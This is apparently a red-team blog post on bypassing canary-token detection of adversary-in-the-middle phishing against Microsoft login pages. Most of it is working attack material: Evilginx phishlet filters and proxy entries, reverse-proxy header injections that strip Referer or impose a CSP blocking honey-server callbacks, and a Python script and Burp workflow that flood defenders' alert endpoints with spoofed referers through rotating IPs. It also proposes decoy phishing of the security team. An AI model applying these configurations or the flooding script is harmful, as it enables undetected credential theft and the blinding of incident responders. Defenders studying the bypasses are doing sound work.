TL;DR
No real canaries were harmed during this research.
We cover four methods that can be used to bypass AiTM phishing detections that rely on JavaScript- or CSS-based callbacks on login pages:
- Removing the parts that would trigger the detection using a regex replace
- Proxying the callbacks themselves
- Using the `Referrer-Policy` header to remove the `Referer` header altogether (spoiler: we uncovered a bug in Chromium browsers that makes this technique fairly useless when the victim is using a Chromium-based browser)
- Using Content Security Policy (CSP) directives to block all types of callbacks, regardless of the level of obfuscation used.
Additionally, a bonus method is shown which takes advantage of the inherent working of these detection mechanisms, turning it against itself by flooding it with bogus alerts.
| Method | CSS callbacks | JS callbacks | Notes |
| --- | --- | --- | --- |
| Regex replace | ✅ | 〰️ | Depends on the level of obfuscation; not a generic solution* |
| Reverse proxying the callback | ✅ | 〰️ | Depends on the level of obfuscation; not a generic solution* |
| Referrer policy `no-referrer` | 〰️ | ❌ | Completely generic solution*, but a Chromium bug causes the referrer policy to be ignored for requests made with the `url()` CSS function. JS callbacks do not need to rely on the `Referer` header at all. |
| Content Security Policy (CSP) | ✅ | ✅ | Generic solution* on a per-phishlet basis. |
| Bonus: alert flooding | ✅ | ✅ | Does not bypass alerts, but still very effective. |
*Generic solutions also remain effective if changes are made to the callback URL or trigger method.
Introduction
As a red teamer, what I like so much about cyber security is the never-ending cat-and-mouse game between attackers and defenders, and how it stimulates creativity and ingenuity on both sides in devising solutions.
When we look at phishing for instance, the widespread adoption of MFA forced attackers to come up with new techniques such as Adversary-in-The-Middle (AiTM) and Device Code Phishing that would allow them to compromise accounts protected with MFA. For a long time, the offensive side has been able to use these techniques very effectively, giving us the impression that we were on the winning team.
Last year, defenders started to catch up by inserting JavaScript-based detection scripts into login pages that trigger an alert when the page detects it is being loaded from an unexpected domain name, which indicates an Adversary-in-the-Middle (AiTM) phishing attempt. The main problem with this approach is that many third-party service providers (rightfully) do not allow custom JavaScript to be inserted into their login pages (which is also the case for the highly targeted Microsoft login pages).
However, earlier this year, defenders found a very interesting way of detecting AiTM phishing attempts with CSS alone (as first described by Zolder.io and later adopted by Thinkst Canary Tokens). The benefit of this approach is that it works on many third-party login pages that allow custom CSS for company branding (such as Microsoft Entra ID login pages).
Very clever move! But now it is our turn again. Let’s play!
CSS-Based Canary/Honey Tokens
To be able to understand the bypass methods described later, we first need to briefly summarize how these Canary/Honey tokens actually work. Feel free to skip this section if you already know this.
Let’s look at a simplified example of how this works in action when targeting an organization using a CSS-based honey token on their Microsoft Entra ID login page:
- The victim user clicks a malicious link sending them to `malicious.com`, on which a reverse proxy phishing tool (such as Evilginx) is running to clone the Microsoft login page (`login.microsoftonline.com`).
- Once the user fills in their email address, Microsoft loads the custom branding configured in the user's tenant. In this case, the custom branding includes a custom CSS file in which a background image (`img.gif`) is defined.
- The custom background image (`img.gif`) is located on a different, non-proxied URL (i.e. the callback URL to the "Honey Server"), resulting in the browser fetching it directly, outside of the proxied session.
- The Honey Server checks the `Referer` header present in the user's request. If the `Referer` matches a list of expected legitimate domains (e.g. `login.microsoftonline.com`), no action is taken. If it doesn't, this most likely indicates an AiTM phishing attack, and an alert is created for the security team to investigate further.
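To make the flow concrete, here is a minimal sketch of what the server side of such a detection could look like. The route, file name, and alerting logic are illustrative assumptions, not any vendor's actual implementation:

```python
from flask import Flask, request, send_file

app = Flask(__name__)

# Referer prefix considered legitimate; anything else suggests an AiTM proxy.
LEGIT_REFERER_PREFIX = "https://login.microsoftonline.com"

@app.route("/img.gif")
def canary_callback():
    referer = request.headers.get("Referer", "")
    if not referer.startswith(LEGIT_REFERER_PREFIX):
        # Unexpected (or missing) Referer: the login page was most likely
        # served from a phishing domain. A real Honey Server would raise
        # an alert for the security team here.
        print(f"[ALERT] possible AiTM phish: referer={referer!r}, "
              f"ip={request.remote_addr}")
    # Serve an innocuous 1x1 white pixel either way (pixel.gif must exist).
    return send_file("pixel.gif", mimetype="image/gif")

if __name__ == "__main__":
    app.run(port=8080)
```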
The only useful information the security team has at this point is the public IP address of the legitimate user and the phishing domain. With just the public IP address, the security team still does not know which user actually visited the malicious website, especially when the user is connecting from a generic public IP address of the company (e.g. from a big office or through the company VPN). Although with decent endpoint, DNS, firewall, and/or email logging, it should be straightforward to find out which user(s) visited the malicious domain.
But most importantly, the blue team can now block the malicious domain to prevent any other users from being able to fall victim to phishing campaigns using this domain name.
The previous illustration is slightly simplified to convey a basic understanding, which should be sufficient to follow the bypasses discussed in the rest of the blog post.
However, for those interested in diving a bit deeper into an actual tangible example, let’s look at how this works underneath for Microsoft Entra ID when combined with something like Canary Tokens. (This will also show you how to enumerate whether a tenant is using canary tokens or not from an unauthenticated perspective.)
When the user enters their email address on the login page, a POST request is sent to the `/common/GetCredentialType` endpoint. This is where Microsoft returns the custom branding details that transform the generic login page into a company-branded one. Specifically, the `customCssUrl` parameter will contain a tenant-specific URL on the `aadcdn.msftauthimages.net` domain where the company-branded CSS is located.
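As a rough sketch of such an unauthenticated check (the username is a placeholder, and since the exact JSON structure of the response may vary across API versions, we simply search the raw body):

```python
import requests

# Placeholder username on the target tenant's domain.
USERNAME = "jane.doe@target-company.com"

resp = requests.post(
    "https://login.microsoftonline.com/common/GetCredentialType",
    json={"username": USERNAME},
    timeout=10,
)

# Search the raw body rather than assuming an exact JSON structure.
if '"customCssUrl":"https' in resp.text:
    print("Tenant serves custom CSS; fetch it and inspect for canary callbacks")
else:
    print("No custom CSS URL returned for this tenant")
```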
Let’s see what these custom CSS files look like when a Canary Token is in place.
When you generate a CSS file from the Canary Tokens website, it should look something like this:
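Shown here is a representative reconstruction; the CloudFront hostname and path are illustrative, as every generated token gets its own random URL:

```css
body {
  background: url('https://dakg4cmpuclai.cloudfront.net/traffic/aBcD3fGh1jKl/img.gif');
}
```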
This CSS code sets a custom background image for the HTML body. The `url()` CSS function is what actually results in a request being sent from the browser to the "Honey Server". When using the free version of Thinkst Canary Tokens, this will usually be a random Amazon CloudFront domain; in theory, however, it could be any custom domain.
When the browser attempts to request what it believes to be a background image, it automatically discloses the phishing domain name in the `Referer` header to the "Honey Server". At this point, the Honey Server already has enough information to create an alert, since it has both the victim's source IP and the phishing domain name.
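For illustration, the callback request arriving at the Honey Server looks roughly like this (hostname and path are placeholders):

```http
GET /traffic/aBcD3fGh1jKl/img.gif HTTP/1.1
Host: dakg4cmpuclai.cloudfront.net
Referer: https://login.malicious.com/
```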
Thinkst Canary Tokens specifically return an additional, strictly unnecessary redirect to a different website with the original referrer in the URL. As explained in their blog post, this is a design decision to reduce costs; it is not necessary for the detection itself.
Additionally, don't focus too much on the very obvious domain name (`canarytokens.com`): in the paid version, this is a different, more random domain, which can also be customized.
Finally, the image is retrieved, which in this case is just a white pixel.
Note that some more advanced implementations of this detection technique will, in addition to creating an alert, return a different background image when an AiTM phishing attack is detected, warning the user not to sign in on the page.
Bypass methods
During our research, we came up with four different ways to bypass both JavaScript and CSS-based detections of Adversary-in-The-Middle attacks.
Why so many? As you will see later, each technique has some benefits and drawbacks, and the method you want to use will depend on your target and your specific requirements. Additionally, nothing stops you from combining multiple techniques at once.
We will also showcase a bonus method at the end which is not really intended as a real bypass, although it will surely mess with the blue team.
- The regex way
- Proxying the reverse proxy detections
- No Referrer! Pretty please?
- Using Content Security Policies (CSP) to our advantage
- Bonus: Phishes everywhere
While we will use Evilginx with a Microsoft phishlet in the examples below, these techniques will apply to any website protected by any type of JavaScript or CSS-based honey tokens. At the end of the blog, we will provide a summary to show what techniques work best for which specific scenarios.
1. The regex way
This is probably the most straightforward method and the first one anyone will think of, so let's start with it.
Since we as attackers already have a Man-in-the-Middle position when the login page is returned, we have the ability to modify the response to our liking.
This means that predictable, unobfuscated strings can easily be removed with a simple regex search and replace. However, this is also the technique's biggest disadvantage: slight modifications to the JavaScript or CSS we want to remove will break this approach. Especially with JavaScript-based detections, obfuscation can get really crazy very quickly.
Additionally, every organization can implement its honey tokens differently (with different JavaScript or CSS), which means it might not always be possible to build a single phishlet for a website using this technique that works for all organizations.
Regardless, let’s look at how to achieve this anyway, as it might still be useful in some cases.
Microsoft is actually a bit of a special case here, as the custom CSS is not defined on one of the domains of the login page itself (i.e. `login.microsoftonline.com`), but on a domain that is commonly not proxied (i.e. `aadcdn.msftauthimages.net`). We could add `aadcdn.msftauthimages.net` as an additional host to be proxied and replace the CSS there, although a more convenient method is to simply remove the reference to the custom CSS URL on the subdomain that we are already proxying.
This can easily be achieved with the regex filter `"customCssUrl":".*?"`, replacing all matches with `"customCssUrl":""` to mimic a configuration where no custom CSS has been defined.
With Evilginx, this is as simple as adding the following sub_filter to your phishlet configuration:
```yaml
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: '"customCssUrl":".*?"', replace: '"customCssUrl":""', mimes: ['application/json']}
```
Note that you might not always have the option to simply clear the `customCssUrl`, especially if an organization also defines other, legitimate styling inside the custom CSS file. In that case, you will need to proxy the `aadcdn.msftauthimages.net` website as well, and use a more specific regex replacement such as the following, which matches all `background` properties containing the `url()` CSS function:
```
background:[\s]*url\(.*?\).*?[;}\n]
```
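As a sketch of how that could look in Evilginx (this assumes `aadcdn.msftauthimages.net` has also been added under `proxy_hosts`, and the exact regex may need tuning per tenant):

```yaml
sub_filters:
  # Hypothetical example: strip background images from the proxied branding CSS.
  - {triggers_on: 'aadcdn.msftauthimages.net', orig_sub: 'aadcdn', domain: 'msftauthimages.net', search: 'background:[\s]*url\(.*?\).*?[;}\n]', replace: '', mimes: ['text/css']}
```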
Once again, this is not a silver bullet that will work every time, as there are countless other CSS properties that accept the `url()` function as a value and can be used by defenders for this purpose.
However, at this point, you might also just want to use a different technique, so let’s look at what else we can do.
2. Proxying the reverse proxy detections
The only reason these detection techniques work is that they assume they can send an out-of-band request which is not proxied by the attacker.
So let’s use the very thing they want to detect, against the detection logic, to render it completely useless again.
If no obfuscation is used, this can be easily achieved in Evilginx by just adding the honey domain as a proxied domain (as well as all necessary domains in between the main login domain and the honey domain):
```yaml
proxy_hosts:
  # Original
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', auto_filter: true, is_landing: false}
  - {phish_sub: 'cdn', orig_sub: 'aadcdn', domain: 'msftauth.net', auto_filter: true, is_landing: false}
  # Extra
  - {phish_sub: 'cdnimages', orig_sub: 'aadcdn', domain: 'msauthimages.net', auto_filter: true}
  - {phish_sub: 'cloudfront', orig_sub: 'dakg4cmpuclai', domain: 'cloudfront.net', auto_filter: true}
  - {phish_sub: 'honey', orig_sub: '', domain: 'canarytokens.com', auto_filter: true}
```
Note that in this case, we are not even going to block the requests to the honey/canary tokens. Just proxying these requests through Evilginx with the `auto_filter` feature will be sufficient to trick the Honey Server into thinking they originated from a normal, non-proxied authentication.
The downside of this method is, once again, that even a little bit of obfuscation to hide the domain will make it a lot harder. However, since there are not many string obfuscation options in pure CSS, this should still work as-is most of the time for CSS-based tokens.
3. No Referrer! Pretty please?
Due to how the CSS-based tokens work, they will only ever be able to depend on the `Referer` header to detect whether the user is signing in from a legitimate domain or not.
So clearly, this `Referer` header being sent with every request is a problem we want to get rid of. If something is bothering us, sometimes it suffices to just politely ask it to stop doing what is bothering us.
This is exactly what the `Referrer-Policy` header can be used for. (Yes, the `Referrer-Policy` header is spelled with a double "r", while the `Referer` header keeps the HTTP spec's historical misspelling.)
The `Referrer-Policy` header allows a website to specify how much information should be included in the `Referer` header of cross-origin requests. The default referrer policy used by most browsers has been `strict-origin-when-cross-origin` for the last couple of years, which basically means that requests to other "origins" (i.e. domains) will only contain the scheme and domain name in the `Referer` header, but not the full URI path and query string. For example, if the URL is `https://malicious.com/login?user-id=1`, the `Referer` header in cross-origin requests will only contain `https://malicious.com/`.
Conveniently, there is also a referrer policy directive called `no-referrer`, which does exactly what it implies: omit the `Referer` header entirely in any request initiated from this web page.
There are a couple of ways to achieve this in practice. My personal preference is to put a different reverse proxy (such as Caddy or Nginx) in front of Evilginx and inject a downstream header that way.
With Caddy, this can be achieved by adding the following line inside the `reverse_proxy` block of the Caddyfile:

```
header_down Referrer-Policy "no-referrer"
```
With Nginx, you can add the following line to your configuration:

```nginx
add_header Referrer-Policy "no-referrer" always;
```
If you don't want to put a different reverse proxy in front of Evilginx, then you can add the following line in the `core/http_proxy.go` file, inside the `p.Proxy.OnResponse().DoFunc()` function (here for example):

```go
resp.Header.Set("Referrer-Policy", "no-referrer")
```
This will force Evilginx to set the `Referrer-Policy: no-referrer` header on every single response, in all phishlets. (Don't forget to recompile the source code!)
Alright, let’s test this in Firefox. As you can see in the following screenshot, this works great!
In the debug tools, the top of the request shows which referrer policy was applied to it. Since the `no-referrer` policy is applied, the `Referer` header is completely omitted from the request.
At this point, the Honey Server knows nothing. Even if an empty `Referer` header were considered suspicious, there is no actionable step that can be taken, since the domain name of the phishing infrastructure is never shared with the blue team.
This is perfect then right? Let’s just add this to every request and be done with this. Well, not really…
If we test the same thing in a Chromium browser (such as Google Chrome, Microsoft Edge, etc.), we see that the `Referer` header is still present.
We've really been breaking our heads over this for way too long, but eventually we found the exact reason why this happens.
Turns out we unintentionally identified a bug in Chromium browsers that causes the referrer policy to be ignored for all requests initiated by the `url()` CSS function.
Purely by chance, this is exactly what these Honey/Canary Tokens are using.
Well, I at least presume this was done without knowledge of this obscure bug in Chromium browsers. But that's okay, every good game involves at least a little bit of luck. 🍀
We reported this bug to the Chromium team, but since it was categorized as a low-severity issue, it doesn't seem like it will be fixed any time soon. So for the time being, we can either pray that our target is not using a Chromium browser, or we need a better solution.
Since it is still our turn to play, let’s look at a more “reliable” approach…
4. Using Content Security Policies (CSP) to our advantage
For those who do some web app pentests from time to time, the Content Security Policy (CSP) should already be fairly familiar. CSP is a security feature that allows a website to harden itself against client-side attacks such as XSS and clickjacking.
In a CSP, a website can define, among other things, from which locations various resources (such as JavaScript, images, style sheets, etc.) may be loaded.
So by injecting one specific header, we can specify exactly which domains our phishing page is allowed to talk to. Requests to any other location are silently blocked by the browser, meaning that from the perspective of the Honey Server, it is as if the user never visited the login page at all.
What is actually intended to be a security feature, can be used as a weapon against these callback requests. The irony…
Once again, we can use any approach described in the previous technique to insert a response header. Let’s look at an example for a Microsoft login phishlet.
The Content Security Policy supports various directives to control different types of fetches. For instance, the `img-src` directive controls from which locations images can be loaded, while `script-src` can be used to restrict JavaScript.
While we could define all of these directives one by one, a simpler solution is to use the `default-src` directive, which acts as a fallback for all the other fetch directives.
Let’s start by adding some generic values since we don’t want to break the functionality of the website:
- `'self'`: allows loading resources from the current origin
- `data:`: allows resources to be loaded through the `data:` scheme
- `'unsafe-inline'`: allows inline scripts and CSS embedded in the page
- `'unsafe-hashes'`: allows JavaScript to be executed through inline event handlers such as `onclick`, `onload`, etc.
- `'unsafe-eval'`: allows dynamic code evaluation such as `eval()` (also included in the final header below)
We don't know whether the Microsoft login page actually uses all of the above, but allowing these sources does us no harm, as none of them can trigger automatic requests to the Honey Servers. If we omitted these keywords from our CSP and the website did use any of these features, things would break. So better safe than sorry.
Next, we need to actually allow all of our phishing subdomains (since these are proxied through Evilginx, there is no risk of a callback going through them). To keep things simple, we can just add a wildcard entry:

```
*.malicious.com
```
Lastly, we want to allow all legitimate non-proxied domains from which resources are expected and allowed to be loaded. We can easily enumerate this by going through the normal login flow with the Network tab open in the built-in browser debugger.
```
aadcdn.msauthimages.net
aadcdn.msftauthimages.net
aadcdn.msauth.net
*.live.com
*.office.com
*.office.net
*.microsoft.com
```
Depending on whether your phishlet is configured to keep proxying the session after authentication or not, you might need to add some additional domains to ensure that the website is able to keep functioning correctly, although the wildcard domains at the end should cover quite a lot already.
This brings us to the final Content Security Policy header, which can be inserted with Caddy as follows:

```
header_down Content-Security-Policy "default-src 'self' data: 'unsafe-inline' 'unsafe-hashes' 'unsafe-eval' *.malicious.com aadcdn.msauthimages.net aadcdn.msftauthimages.net aadcdn.msauth.net *.live.com *.office.com *.office.net *.microsoft.com"
```
Note: You can insert this response header any way you want, for example with Nginx or by modifying the Evilginx source code as described above. I also noticed this PR, which allows you to define custom response headers from within a phishlet. I have not tested it, but if it works as described, it would also be a nice solution, since these CSP headers are something you want to define on a per-phishlet basis.
When we test this, we can see that the callback request for the "background image" defined in the CSS (which would trigger the alert) is blocked by the browser because it violates the Content Security Policy, as indicated by the `{blocked:csp}` status.
The CSP blocks are also visible in the console of the browser debugger, which can be useful when figuring out what to allow and what not. By starting with a restrictive Content Security Policy that blocks everything except the phishing domains, you can gradually add domains that serve legitimate resources, through trial and error, until nothing (except possibly a honey token callback) is blocked anymore.
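One way to make this tuning less disruptive (my own suggestion, not something from the tooling above) is to start with the standard `Content-Security-Policy-Report-Only` header, which logs violations to the browser console without actually blocking anything, and only switch to the enforcing header once a legitimate login flow produces no more violations. Note that while report-only is active, callbacks are not blocked, so only do this tuning in a test setup:

```
header_down Content-Security-Policy-Report-Only "default-src 'self' data: 'unsafe-inline' 'unsafe-hashes' 'unsafe-eval' *.malicious.com"
```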
5. Bonus: Phishes everywhere
So far we’ve seen how we can prevent alerts from being created. But what if we just take a different approach? What if we do want to trigger some alerts? Like, a lot of them. All containing bogus information to drown the security team in a flood of alerts.
When used at a continuous rate over a long timeframe, this can potentially be used to mask alerts from an actual phishing attack. Surely this will put analysts even more on edge, right? Sure, but what are they going to do about it if we just keep this running for days or even weeks before actually performing a real attack? As previously established, these alerts only give the security team two pieces of (useful) information, and both can easily be influenced by an attacker:
- The malicious phishing domain name (through the HTTP `Referer` header): this is just an HTTP header that can easily be spoofed by an attacker using a list of random domain names.
- The source IP of the victim user visiting the phishing page: we can route each request through a different source IP, for instance using something like fireprox.
If we ensure that these two pieces of information are completely random, the security team will be unable to differentiate between real and bogus alerts.
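Conceptually, the flooding boils down to something like the following minimal Python sketch. The callback URL and domain list are placeholders, and true source IP rotation would come from routing through something like fireprox rather than from this script itself:

```python
import random
import time

import requests

# Placeholder: substitute the actual canary/honey token callback URL.
CALLBACK_URL = "https://dakg4cmpuclai.cloudfront.net/traffic/aBcD3fGh1jKl/img.gif"

# Bogus "phishing" domains to leak through the Referer header; these could
# also come from a top-domains list or a feed of recently registered domains.
FAKE_DOMAINS = ["spotify.com", "example-shop.net", "totally-legit-login.io"]

for _ in range(1000):
    fake_referer = f"https://{random.choice(FAKE_DOMAINS)}/"
    # Every request triggers one bogus alert on the Honey Server.
    requests.get(CALLBACK_URL, headers={"Referer": fake_referer}, timeout=10)
    time.sleep(0.2)  # roughly 5 requests per second, as in the demo below
```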
For this proof of concept, we will use Burp Suite Intruder combined with the IP Rotate extension.
Depending on how aggressive you want to be, you can set the request delay higher or lower, but we will use about 5 requests per second in this demonstration.
For random domains, we have a couple of options. We could generate some random non-existing domain names, use a list of the top most common domains (such as CloudFlare’s top domains list), or search for a list of recently registered domains (such as this one).
We can load a request to the canary token callback endpoint into Burp Suite's Intruder and define the payload position in the `Referer` header. As explained at the beginning of this post, Thinkst Canary Tokens use an unnecessary intermediary step with a redirect where the domain is also placed in a URI parameter, so we replaced that one as well.
And then we click Start Attack.
From the perspective of the security team, this will look something like this: hundreds of alerts created within a couple of seconds. Since we are using the IP Rotate extension to forward all our requests through the Amazon API Gateway, a different random IP is used for almost every request.
Each alert will have a different domain name, so it is also not possible to filter out requests from a specific domain. In this case, it looks like Spotify is hosting a phishing page.
Specifically for Thinkst Canary Tokens, we noticed that some throttling of notifications eventually kicks in. When this occurs, alerts are still logged in the Canary Console itself, but it will stop sending out SMS messages, emails, and even webhook notifications about new alerts. At the start, this is only temporary, but if the throttling occurs more than 35 times in a week, then all notifications are permanently blocked, meaning that no alerts will be forwarded to a SIEM or monitored mailbox anymore from that point on.
Regardless of whether alert throttling kicks in or not, it doesn’t seem like the security team stands any chance of defending against something like this. Either they just disable all alerts for this canary token, or they are flooded with bogus alerts. Neither solution seems any better than the other. The only thing you can do at this point is change the callback URL and hope that the attacker doesn’t switch over to flooding that one.
As an alternative to drowning the security team in hundreds of fake alerts, a small number of fake alerts could also be triggered as misdirection, diverting the security team's attention while something else is happening in the background.
This will surely send them on a wild goose chase for a while, trying to investigate where these alerts are coming from without finding any traces of connections to the malicious domains in any of the network logs.
If you are really evil, you could maybe even send some very obvious phishing emails containing links to the fake malicious domains to a big group of employees first, and then gradually keep triggering the canary token alerts from different source IPs. That should keep them busy for some time, resetting innocent user credentials out of precaution and digging through sign-in logs for anything out of the ordinary, all while you’re actually targeting completely different accounts using a more advanced pretext.
Heck, why not even send the email to the whole security team and make them wonder which of their colleagues actually fell for it, while each of them persistently denies having interacted with such an obvious phishing email? 🍿
Summary
We went over quite a few techniques that can be used to interfere with these sneaky AiTM phishing detections. We mainly focused on the newer CSS callbacks, since those are the most common on third-party login pages, although many of these techniques can also be used against JavaScript-based callbacks. However, because much more obfuscation is possible in JavaScript, this can drastically impact the feasibility of some of these techniques.
| Method | CSS callbacks | JS callbacks | Notes |
| --- | --- | --- | --- |
| Regex replace | ✅ | 〰️ | Depends on the level of obfuscation; not a generic solution* |
| Reverse proxying the callback | ✅ | 〰️ | Depends on the level of obfuscation; not a generic solution* |
| Referrer policy `no-referrer` | 〰️ | ❌ | Completely generic solution*, but a Chromium bug causes the referrer policy to be ignored for requests made with the `url()` CSS function. JS callbacks do not need to rely on the `Referer` header at all. |
| Content Security Policy (CSP) | ✅ | ✅ | Generic solution* on a per-phishlet basis. |
| Bonus: alert flooding | ✅ | ✅ | Does not bypass alerts, but still very effective. |
*Generic solutions also remain effective if changes are made to the callback URL or trigger method.
If no obfuscation is used, creating a small regex or proxying some additional domains can be a quick solution that should work great for one specific target.
As long as the Chromium bug that causes the referrer policy to be ignored remains unfixed, the `no-referrer` technique will sadly not be that useful.
Overall, the CSP method seems to be the most reliable solution: it can be set up once for a specific phishlet and will keep working for both CSS- and JS-based callbacks. The same CSP should work across different tenants, regardless of the amount of obfuscation.
And if all else fails, you know what to do 😉
Conclusion
As with all defense-in-depth measures, these tokens are definitely not a silver bullet that will completely prevent these types of phishing attacks. However, that does not mean they are useless either. Yes, they can be bypassed in several ways, but the bypasses introduce additional effort for attackers: an extra cost that some threat actors might not be willing to pay, or might simply lack the knowledge for, so at least some attacks will still be caught. Additionally, even attackers who do put in the extra effort might make a small mistake that accidentally triggers an alert during testing or even during a live phishing campaign (for example, a single typo in the regex, the CSP, or the refer(r)er headers).
Regardless, it is still good to be aware of the capabilities of a sophisticated threat actor and know that an Adversary-in-the-Middle phishing attack should not be directly disregarded as a possible initial access vector during incident response, even if no alert was triggered.
I think this is a good time to call ‘Check’. Defenders, it’s your turn again. Will we finally see non-downgradable phishing-resistant authentication methods breaking through (passkeys)? Will we start encountering more well-configured, strict device- and location-based conditional access policies being used in large organizations? Or will we be surprised with something completely different to bridge the gap until the previous is actually widely implemented?
Time will tell. But for now, let’s enjoy this victory lap.